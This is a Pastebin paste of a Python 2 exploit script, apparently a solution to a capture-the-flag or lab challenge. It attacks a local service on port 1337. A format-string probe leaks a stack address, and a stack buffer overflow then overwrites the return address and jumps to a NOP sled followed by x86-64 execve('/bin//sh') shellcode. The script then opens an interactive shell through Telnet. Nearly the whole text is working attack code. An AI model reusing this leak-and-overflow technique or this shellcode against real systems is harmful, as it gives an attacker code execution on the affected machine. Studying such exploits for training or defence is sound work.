Advertisement
Guest User

Exploit.py

a guest
Feb 20th, 2020
105
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 1.20 KB | None | 0 0
  1. ```import struct
  2. import socket
  3. import os
  4.  
  5. # connection details
  6. # // host = 'localhost'
  7. # //port = '1337'
  8.  
  9. s = socket.socket()
  10. s.connect(('localhost', 1337))
  11. r = s.recv(1024)
  12. s.send("%p,%p,%p\n")
  13. while ',' not in r:
  14. r = s.recv(1024)
  15. start_buf = int(r.split(',')[1], 16)-9
  16. os.system("clear")
  17. print("parad0x shellcode exploit :) \n19/02/2020\n")
  18. print("start of buffer leak: 0x{:08x}\n".format(start_buf))
  19. print("Running on {localhost:1337}\n")
  20.  
  21. raw_input('exploit is ready (press enter 2x)\n')
  22. padding = "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000"
  23. #shellcode = "\xcc"*64
  24. shellcode = "\x90\x6a\x42\x58\xfe\xc4\x48\x99\x52\x48\xbf\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x57\x54\x5e\x49\x89\xd0\x49\x89\xd2\x0f\x05"
  25. RIP = struct.pack("Q", (start_buf+len(padding)+8)+10)
  26. payload = padding + RIP + "\x90"*64 + shellcode
  27. s.send(payload)
  28. print('\n')
  29. print("Exploit Succeeded! You can run SUDO commands here")
  30. from telnetlib import Telnet
  31. t = Telnet()
  32. t.sock = s
  33. t.interact()
  34. s.close()```
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement